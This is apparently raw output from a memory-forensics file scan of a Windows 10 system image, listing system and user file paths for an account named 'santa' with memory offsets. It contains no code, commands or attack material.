\Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\mpasdlta.vdm 216 +0x918b760e4bf0 \Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\mpavdlta.vdm 216 +0x918b760e4d80 \ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb 216 +0x918b760e50a0 \Windows\Temp\E39618F2-C692-4495-9595-CD89B93B468221c0.1da1a23e07d5c34\mpasdlta.vdm 216 +0x918b760e5230 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b760e53c0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db 216 +0x918b760e5550 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db 216 +0x918b760e56e0 \$Directory 216 +0x918b760e5870 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\BingConfigurationClient.dll 216 +0x918b760e5a00 \Users\santa\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm 216 +0x918b760e5b90 \$Directory 216 +0x918b760e5d20 \Windows\System32\ConstraintIndex.Search.dll 216 +0x918b760e5eb0 \$Directory 216 +0x918b760e61d0 \Windows\System32\APHostClient.dll 216 +0x918b760e64f0 \Windows\System32\tzres.dll 216 +0x918b760e6680 \Windows\System32\en-US\urlmon.dll.mui 216 +0x918b760e6810 \Windows\System32\en-US\mshtml.dll.mui 216 +0x918b760e69a0 \Windows\System32\en-US\tzres.dll.mui 216 +0x918b760e6b30 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.12.3.18362_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 216 +0x918b760e7170 \Windows\System32\accountaccessor.dll 216 +0x918b760e7300 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll 216 +0x918b760e7490 \Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\AC Power Download 216 +0x918b760e7620 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b760e77b0 \Windows\System32\jscript9.dll 216 +0x918b760e7ad0 \$Directory 216 +0x918b760e7c60 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep 216 +0x918b760e7df0 \Windows\Registration\R000000000006.clb 216 +0x918b760e8110 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b760e82a0 \$Directory 216 +0x918b760e8430 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.12.3.18362_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b760e85c0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.12.3.18362_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 216 +0x918b760e8750 \Users\santa\Pictures\wallpaper.png 216 +0x918b760e88e0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\wallpaper.png 216 +0x918b760e8a70 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{49040C94-439D-4181-939B-400DF4927C3F}.catalogItem 216 +0x918b760e8d90 \Windows\SysWOW64\msvcp140.dll 216 +0x918b760e90b0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{444D7E83-38FD-41A7-B6C9-E2408C16522A}.catalogItem 216 +0x918b760e9240 \$Directory 216 +0x918b760e93d0 \Windows\System32\HolographicExtensions.dll 216 +0x918b760e9560 \Windows\System32\linkinfo.dll 216 +0x918b760e96f0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{34A29904-08E5-4E25-8DFA-E11604620A36}.catalogItem 216 +0x918b760e9880 \Windows\System32\wuapihost.exe 216 +0x918b760e9a10 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{4A28E9F2-073A-4423-A514-4213FFEFEBBA}.catalogItem 216 +0x918b760e9ba0 \Windows\System32\VirtualMonitorManager.dll 216 +0x918b760e9d30 \$Directory 216 +0x918b760ea1e0 \$Directory 216 +0x918b760ea370 \Windows\System32\en-US\MMDevAPI.dll.mui 216 +0x918b760ea500 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{3F8A46C6-51AA-4DE5-B34D-84B7720C385E}.catalogItem 216 +0x918b760ea690 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{36EEEF0D-07D7-461B-BD63-4D59DBAAA9F1}.catalogItem 216 +0x918b760ea820 \srvsvc 216 +0x918b760ea9b0 \Windows\System32\provthrd.dll 216 +0x918b760eab40 \Windows\System32\security.dll 216 +0x918b760eacd0 \Windows\System32\Windows.Web.Http.dll 216 +0x918b760eae60 \$Directory 216 +0x918b760eb180 \$Directory 216 +0x918b760eb310 \$Directory 216 +0x918b760eb4a0 \Windows\System32\schedcli.dll 216 +0x918b760eb630 \Users\santa\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db 216 +0x918b760eb7c0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{3FDEDDC5-ACC3-45B4-8673-DB8404A61C04}.catalogItem 216 +0x918b760eb950 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{5D04056B-EE2D-4D26-9D9A-5E94F6BD26BD}.catalogItem 216 +0x918b760ebc70 \$Directory 216 +0x918b760ebe00 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9DB307E7-AED6-43BD-A9D9-74DCFFA69083}.catalogItem 216 +0x918b760ec2b0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{60166A20-898B-4410-8545-F859A33EE497}.catalogItem 216 +0x918b760ec440 \Windows\SysWOW64\vcruntime140.dll 216 +0x918b760ec5d0 \Windows\Registration\R000000000006.clb 216 +0x918b760ec8f0 \Windows\System32\winevt\Logs\State.evtx 216 +0x918b760eca80 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db 216 +0x918b760ecc10 \Endpoint 216 +0x918b760ed0c0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db 216 +0x918b760ed250 \Users\santa\Pictures\wallpaper.png 216 +0x918b760ed3e0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\wallpaper.png 216 +0x918b760ed570 \Windows\System32\en-US\twinui.pcshell.dll.mui 216 +0x918b760ed700 \Windows\System32\AboveLockAppHost.dll 216 +0x918b760eda20 \Windows\System32\NPSM.dll 216 +0x918b760edbb0 \Windows\System32\Windows.Web.dll 216 +0x918b760edd40 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{5D34A17C-E779-43E3-8F10-9B8EC079AB07}.catalogItem 216 +0x918b760eded0 \Users\santa\Searches\desktop.ini 216 +0x918b760ee1f0 \Windows\System32\wbem\ntevt.dll 216 +0x918b760ee380 \Users\santa\AppData\Local\Microsoft\OneDrive\23.221.1024.0002\FileSyncShell64.dll 216 +0x918b760ee510 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9AED473A-31C1-465E-BC4E-33B9015007B6}.catalogItem 216 +0x918b760ee6a0 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b760ee830 \Windows\System32\EhStorShell.dll 216 +0x918b760ee9c0 \$Directory 216 +0x918b760eeb50 \Users\santa\AppData\Local\ConnectedDevicesPlatform\L.santa\ActivitiesCache.db 216 +0x918b760eece0 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd 216 +0x918b760eee70 \Dev\Query 216 +0x918b760ef190 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm 216 +0x918b760ef320 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9F531629-9C7B-49B3-838F-43E812031C81}.catalogItem 216 +0x918b760ef4b0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\S-1-5-21-1046918562-1299961717-1331875240-1001.pckgdep 216 +0x918b760ef640 \CMNotify 216 +0x918b760ef7d0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{B596C7B4-0FE0-4D0E-8F37-E96773FE9F78}.catalogItem 216 +0x918b760ef960 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C3C2A2A6-3256-41E6-B7A5-B6F3A56D6678}.catalogItem 216 +0x918b760efaf0 \Dev\Query 216 +0x918b760efc80 \Windows\System32\winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx 216 +0x918b760efe10 \Windows\SysWOW64\en-US\fwpuclnt.dll.mui 216 +0x918b760f0130 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{B64B03EB-23B1-4C72-85E1-1BAFBC392F07}.catalogItem 216 +0x918b760f02c0 \$Directory 216 +0x918b760f0450 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{BAB5EB9A-271F-464B-BBFB-DBE76F5B333D}.catalogItem 216 +0x918b760f05e0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{C5C5C73B-B43A-4639-B50A-5D6FBE6CF6FC}.catalogItem 216 +0x918b760f0770 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{BFE037EF-488A-4482-B8E5-23DFBA0D2CFE}.catalogItem 216 +0x918b760f0900 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{D1010237-5028-41EA-80E8-F4CD4FB58B20}.catalogItem 216 +0x918b760f0a90 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{BDA779DB-96E8-4B17-BD2C-AD23AA6B4953}.catalogItem 216 +0x918b760f0c20 \Windows\rescache\_merged\1198001884\1532113745.pri 216 +0x918b760f0db0 \Windows\System32\Windows.Internal.Signals.dll 216 +0x918b760f10d0 \Windows\SystemResources\ShellComponents\ShellComponents.pri 216 +0x918b760f1260 \Windows\Registration\R000000000006.clb 216 +0x918b760f13f0 \Windows\System32\TaskFlowDataEngine.dll 216 +0x918b760f1580 \Windows\System32\Windows.Data.Activities.dll 216 +0x918b760f18a0 \Dev\Query 216 +0x918b760f1a30 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{A6A0EBC6-A68F-416F-A217-B6AA98F6FA30}.catalogItem 216 +0x918b760f1ee0 \$Directory 216 +0x918b760f2200 \Users\santa\AppData\Local\ConnectedDevicesPlatform\L.santa\ActivitiesCache.db-wal 216 +0x918b760f2390 \$Directory 216 +0x918b760f2520 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DD06B977-BF50-499A-9303-B1C89D578889}.catalogItem 216 +0x918b760f26b0 \Windows\System32\LockController.dll 216 +0x918b760f29d0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{EDFCC36C-26F3-474A-9006-29093111FE13}.catalogItem 216 +0x918b760f2b60 \$Directory 216 +0x918b760f2cf0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b760f31a0 \Windows\Prefetch\DLLHOST.EXE-C2B2ECC1.pf 216 +0x918b760f3330 \Windows\System32\Windows.ApplicationModel.LockScreen.dll 216 +0x918b760f34c0 \Windows\Globalization\ICU\icudtl.dat 216 +0x918b760f3650 \Endpoint 216 +0x918b760f37e0 \Windows\System32\en-US\crypt32.dll.mui 216 +0x918b760f3970 \Windows\Globalization\ICU\timezoneTypes.res 216 +0x918b760f3b00 \Windows\System32\PCShellCommonProxyStub.dll 216 +0x918b760f3c90 \$Directory 216 +0x918b760f3e20 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{ED95330E-AF5E-431E-8BA5-9AFF6FE75A1E}.catalogItem 216 +0x918b760f4140 \Users\santa\AppData\Local\ConnectedDevicesPlatform\L.santa\ActivitiesCache.db-shm 216 +0x918b760f42d0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DA6CD408-E8E4-4098-82A8-B7088801E6B3}.catalogItem 216 +0x918b760f4460 \Windows\SysWOW64\en-US\twinapi.dll.mui 216 +0x918b760f45f0 \Users\santa\AppData\Roaming\Microsoft\Protect\S-1-5-21-1046918562-1299961717-1331875240-1001\Preferred 216 +0x918b760f4780 \$Directory 216 +0x918b760f4910 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{DE3C13E8-0C5B-4A7D-8DF5-E63676E1C3DA}.catalogItem 216 +0x918b760f4aa0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{E651F2E7-9072-4E12-9EB6-4BF1CE4B05FE}.catalogItem 216 +0x918b760f4c30 \Windows\System32\ShellCommonCommonProxyStub.dll 216 +0x918b760f4dc0 \Windows\System32\config\systemprofile\AppData\Local\Microsoft\InstallService\{FE986C6C-BD0C-4F58-AE21-E0C338D2E79E}.catalogItem 216 +0x918b760f50e0 \Windows\Prefetch\VMWARERESOLUTIONSET.EXE-F78A3A07.pf 216 +0x918b760f5270 \Server 216 +0x918b760f5590 \Windows\SysWOW64\DataExchange.dll 216 +0x918b760f5720 \$Directory 216 +0x918b760f58b0 \CMApi 216 +0x918b760f5a40 \$Directory 216 +0x918b760f5bd0 \Windows\Registration\R000000000006.clb 216 +0x918b760f5d60 \ProgramData\Microsoft\Windows\OneSettings\CTAC.json 216 +0x918b760f5ef0 \Windows\System32\TaskSchdPS.dll 216 +0x918b760f6080 \Windows\System32\cryptxml.dll 216 +0x918b760f6210 \$Directory 216 +0x918b760f63a0 \Windows\System32\en-US\netmsg.dll.mui 216 +0x918b760f6530 \Windows\System32 216 +0x918b760f66c0 \Windows\System32\mssph.dll 216 +0x918b760f6850 \$Directory 216 +0x918b760f69e0 \CMApi 216 +0x918b760f6b70 \Windows\System32\ngcsvc.dll 216 +0x918b760f6d00 \Program Files\VMware\VMware Tools\VMwareResolutionSet.exe 216 +0x918b760f71b0 \$Directory 216 +0x918b760f74d0 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db 216 +0x918b760f7660 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db 216 +0x918b760f7980 \Windows\System32\icmp.dll 216 +0x918b760f7ca0 \Windows\System32\Windows.Energy.dll 216 +0x918b760f7e30 \$Recycle.Bin\S-1-5-21-1046918562-1299961717-1331875240-1001\desktop.ini 216 +0x918b760f8150 \Users\santa\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_785_POS4.jpg 216 +0x918b760f82e0 \Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe 216 +0x918b760f8470 \Reference 216 +0x918b760f8600 \Windows\System32\en-US\shell32.dll.mui 216 +0x918b760f8790 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b760f8ab0 \Windows\System32\NgcCtnrGidsHandler.dll 216 +0x918b760f8c40 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b760f90f0 \Windows\System32\en-US\ncrypt.dll.mui 216 +0x918b760f9280 \Windows\System32\winevt\Logs\Microsoft-Windows-Security-LessPrivilegedAppContainer%4Operational.evtx 216 +0x918b760f9410 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe 216 +0x918b760f95a0 \Sessions\1\AppContainerNamedObjects\S-1-15-2-2758101530-1321080646-1475665648-4066602542-2880396197-3643791541-2654759312 216 +0x918b760f9730 \Windows\System32\LicenseManagerApi.dll 216 +0x918b760f98c0 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5\msedgeupdateres_en.dll 216 +0x918b760f9be0 \Windows\SysWOW64\oleaut32.dll 216 +0x918b760f9d70 \CMApi 216 +0x918b760fa090 \$Directory 216 +0x918b760fa220 \Windows\System32\NgcCtnr.dll 216 +0x918b760fa3b0 \Sessions\1\AppContainerNamedObjects\S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000 216 +0x918b760fa540 \Windows\System32\Clipc.dll 216 +0x918b760fa6d0 \Windows\SystemResources\shell32.dll.mun 216 +0x918b760fa860 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe 216 +0x918b760fa9f0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb 216 +0x918b760fab80 \Windows\System32\NgcCtnrSvc.dll 216 +0x918b760fad10 \Users\santa\AppData\Local\Microsoft\EdgeUpdate\1.3.181.5 216 +0x918b760faea0 \ProgramData\Microsoft\Diagnosis\DownloadedSettings\TELEMETRY.ASM-WINDOWSSQ.json.new 216 +0x918b760fb350 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b760fb4e0 \Windows\System32\wuaueng.dll 216 +0x918b760fb670 \$Directory 216 +0x918b760fb800 \$Directory 216 +0x918b760fb990 \Windows\System32\conhost.exe 216 +0x918b760fbb20 \Windows\System32\en-US\InputSwitch.dll.mui 216 +0x918b760fbe40 \Windows\System32\en-US\stobject.dll.mui 216 +0x918b760fc160 \Windows\System32\LicenseManager.dll 216 +0x918b760fc2f0 \Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx 216 +0x918b760fc480 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 216 +0x918b760fc610 \Windows\System32\wwapi.dll 216 +0x918b760fc7a0 \Connect 216 +0x918b760fcc50 \Windows\System32\prnfldr.dll 216 +0x918b760fcde0 \Windows\System32\notepad.exe 216 +0x918b760fd290 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b760fd420 \Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe 216 +0x918b760fd5b0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b760fd740 \Sessions\1\AppContainerNamedObjects\S-1-15-2-155514346-2573954481-755741238-1654018636-1233331829-3075935687-2861478708 216 +0x918b760fd8d0 \Windows\System32\en-US\dsreg.dll.mui 216 +0x918b760fda60 \$Directory 216 +0x918b760fdd80 \Windows\System32\en-US\shell32.dll.mui 216 +0x918b760fe0a0 \Windows\System32\cflapi.dll 216 +0x918b760fe3c0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 216 +0x918b760fe550 \Windows\System32\WPDShServiceObj.dll 216 +0x918b760fe870 \$Directory 216 +0x918b760feb90 \$Directory 216 +0x918b760feeb0 \Dev\Query 216 +0x918b761b3290 \$NonCachedIo 216 +0x918b764971e0 \Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy 216 +0x918b76497370 \Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-FontSet-S-1-5-21-1046918562-1299961717-1331875240-1001.dat 216 +0x918b76497500 \Windows\System32\en-US\shell32.dll.mui 216 +0x918b764979b0 \$Directory 216 +0x918b76497b40 \Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\resources.pri 216 +0x918b76497cd0 \Windows\System32\Windows.UI.Xaml.Resources.th.dll 216 +0x918b76498180 \Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\pris\resources.en-US.pri 216 +0x918b764984a0 \Windows\System32\RuntimeBroker.exe 216 +0x918b764987c0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.LockApp_10.0.18362.1_neutral__cw5n1h2txyewy\ActivationStore.dat 216 +0x918b76498950 \Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\~FontCache-S-1-5-21-1046918562-1299961717-1331875240-1001.dat 216 +0x918b76498ae0 \Windows\System32\LockAppBroker.dll 216 +0x918b76498c70 \Windows\System32\Windows.Internal.Shell.Broker.dll 216 +0x918b76498e00 \Windows\System32\Windows.Media.Devices.dll 216 +0x918b76499120 \Windows\System32\appinfoext.dll 216 +0x918b764992b0 \Windows\System32\en-US\napinsp.dll.mui 216 +0x918b76499440 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.LockApp_10.0.18362.1_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG1 216 +0x918b76499760 \$Directory 216 +0x918b764998f0 \CMApi 216 +0x918b76499a80 \Windows\rescache\_merged\3900133415\2919480952.pri 216 +0x918b76499c10 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.LockApp_10.0.18362.1_neutral__cw5n1h2txyewy\ActivationStore.dat.LOG2 216 +0x918b7649a0c0 \$Directory 216 +0x918b7649a250 \Windows\Fonts\segoeui.ttf 216 +0x918b7649a570 \Program Files\WindowsApps\Microsoft.WindowsStore_12107.1001.15.0_x64__8wekyb3d8bbwe\WinStore.App.dll 216 +0x918b7649abb0 \Sessions\1\AppContainerNamedObjects\S-1-15-2-3539788797-2700867667-1432428195-1581642-2885308443-3834444517-2495346167 216 +0x918b7649ad40 \Windows\Fonts\georgiaz.ttf 216 +0x918b7649b1f0 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b7649b6a0 \Windows\System32\Windows.Services.TargetedContent.dll 216 +0x918b7649bb50 \Windows\Registration\R000000000006.clb 216 +0x918b7649be70 \Windows\System32\en-US\dwmapi.dll.mui 216 +0x918b7649c190 \Windows\System32 216 +0x918b7649c320 \CMApi 216 +0x918b7649c4b0 \Windows\System32\CapabilityAccessManagerClient.dll 216 +0x918b7649c640 \$Directory 216 +0x918b7649c7d0 \Windows\Registration\R000000000006.clb 216 +0x918b7649ce10 \$Directory 216 +0x918b7649d450 \Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Internal.Search.winmd 216 +0x918b7649d5e0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b7649d770 \Windows\System32\backgroundTaskHost.exe 216 +0x918b7649da90 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1 216 +0x918b7649dc20 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.StartMenuExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2 216 +0x918b7649ddb0 \$Directory 216 +0x918b7649e260 \CMApi 216 +0x918b7649e3f0 \Dev\Query 216 +0x918b7649e580 \Dev\Query 216 +0x918b7649e8a0 \Windows\SysWOW64\en-US\pnrpnsp.dll.mui 216 +0x918b7649ea30 \Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe\resources.pri 216 +0x918b7649ebc0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b7649ed50 \Windows\System32\MtcModel.dll 216 +0x918b7649f200 \Windows\SystemResources\imageres.dll.mun 216 +0x918b7649f390 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b7649f520 \Windows\System32\SearchIndexer.exe 216 +0x918b7649f6b0 \$Directory 216 +0x918b7649f9d0 \Windows\System32\NcaApi.dll 216 +0x918b7649fcf0 \Windows\System32 216 +0x918b7649fe80 \Windows\Fonts\trebuc.ttf 216 +0x918b764a01a0 \Windows\System32\en-US\AuthExt.dll.mui 216 +0x918b764a0330 \Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy 216 +0x918b764a0650 \Dev\Query 216 +0x918b764a07e0 \Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat 216 +0x918b764a0970 \Windows\System32\hcproviders.dll 216 +0x918b764a0b00 \Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1 216 +0x918b764a0c90 \$Directory 216 +0x918b764a0e20 \$Directory 216 +0x918b764a12d0 \Windows\System32\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll 216 +0x918b764a1780 \Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\resources.pri 216 +0x918b764a1910 \$Directory 216 +0x918b764a1aa0 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b764a1c30 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b764a1dc0 \ProgramData\Microsoft\Windows\WER\ReportArchive 216 +0x918b764a20e0 \Windows\ShellExperiences\StartUI.dll 216 +0x918b764a2270 \Windows\System32 216 +0x918b764a2400 \Windows\System32\en-US\ActionCenter.dll.mui 216 +0x918b764a2590 \CMApi 216 +0x918b764a2720 \Windows\Fonts\segoeui.ttf 216 +0x918b764a28b0 \Windows\rescache\_merged\4124255888\4008532806.pri 216 +0x918b764a2a40 \Windows\SystemResources\Windows.UI.ShellCommon\Windows.UI.ShellCommon.pri 216 +0x918b764a2bd0 \$Directory 216 +0x918b764a2d60 \Windows\rescache\_merged\3535846728\48666455.pri 216 +0x918b764a2ef0 \Windows\System32\Windows.Storage.ApplicationData.dll 216 +0x918b764a3080 \Windows\System32\biwinrt.dll 216 +0x918b764a36c0 \Users\santa\AppData\Local\Microsoft\Windows\WER\ERC 216 +0x918b764a3850 \Windows\Fonts\segoeuisl.ttf 216 +0x918b764a39e0 \Windows\System32\en-US\ESENT.dll.mui 216 +0x918b764a3b70 \ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx 216 +0x918b764a3e90 \Windows\Fonts\comicbd.ttf 216 +0x918b764a41b0 \Windows\System32\en-US\SearchIndexer.exe.mui 216 +0x918b764a4340 \Windows\Fonts\consolai.ttf 216 +0x918b764a44d0 \$Directory 216 +0x918b764a4660 \Windows\WinSxS\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.18362.30_none_210ac8966535eaa7\GdiPlus.dll 216 +0x918b764a4980 \$Directory 216 +0x918b764a4b10 \$Directory 216 +0x918b764a4ca0 \Windows\System32 216 +0x918b764a4e30 \$ConvertToNonresident 216 +0x918b764a52e0 \Windows\System32 216 +0x918b764a5470 \Windows\Fonts\comic.ttf 216 +0x918b764a5920 \Windows\System32\wermgr.exe 216 +0x918b764a5950 妨癊醋￿妨癊醋￿ 0 +0x918b764a5c40 \Windows\Fonts\comici.ttf 216 +0x918b764a5dd0 \Windows\System32\feclient.dll 216 +0x918b764a60f0 \Windows\Fonts\comicz.ttf 216 +0x918b764a6280 \Windows\Fonts\consolab.ttf 216 +0x918b764a6410 \$Directory 216 +0x918b764a65a0 \Windows\Registration\R000000000006.clb 216 +0x918b764a6730 \Windows\System32\en-US\windows.storage.dll.mui 216 +0x918b764a6a50 \Users\santa\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2 216 +0x918b764a6be0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.Cortana_1.12.3.18362_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat 216 +0x918b764a6d70 \$Directory 216 +0x918b764a7090 \Windows\System32\winevt\Logs\Microsoft-Windows-WindowsBackup%4ActionCenter.evtx 216 +0x918b764a7220 \Users\santa\AppData\Roaming\Microsoft\Windows\Printer Shortcuts 216 +0x918b764a73b0 \Windows\System32\Windows.Globalization.Fontgroups.dll 216 +0x918b764a76d0 \$Directory 216 +0x918b764a7860 \Program Files (x86)\Mozilla Firefox 216 +0x918b764a79f0 \Users\santa\AppData\Roaming\Microsoft\Windows\Printer Shortcuts 216 +0x918b764a7b80 \Windows\System32\RuntimeBroker.exe 216 +0x918b764a7d10 \Windows\Fonts\consolaz.ttf 216 +0x918b764a7ea0 \$Directory 216 +0x918b764a8350 \Users\santa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned 216 +0x918b764a84e0 \ProgramData\Microsoft\Windows\Start Menu\Programs 216 +0x918b764a8670 \Windows 216 +0x918b764a8800 \ProgramData\Microsoft\Windows\Start Menu\Programs 216 +0x918b764a8990 \Windows\System32\BthTelemetry.dll 216 +0x918b764a8b20 \$Directory 216 +0x918b764a8cb0 \$Directory 216 +0x918b764a8e40 \ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.jfm 216 +0x918b764a9160 \Windows\System32\fontgroupsoverride.dll 216 +0x918b764a92f0 \Program Files (x86)\Mozilla Firefox 216 +0x918b764a9610 \Users\santa\AppData\Local\Microsoft\Windows\Burn 216 +0x918b764a97a0 \Windows\SystemResources\Windows.UI.ShellCommon\pris\Windows.UI.ShellCommon.en-US.pri 216 +0x918b764a9ac0 \Users\santa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned 216 +0x918b764a9c50 \$Directory 216 +0x918b764a9de0 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b764aa100 \Windows\System32\mssprxy.dll 216 +0x918b764aa420 \CMApi 216 +0x918b764aa5b0 \$Directory 216 +0x918b764aa740 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 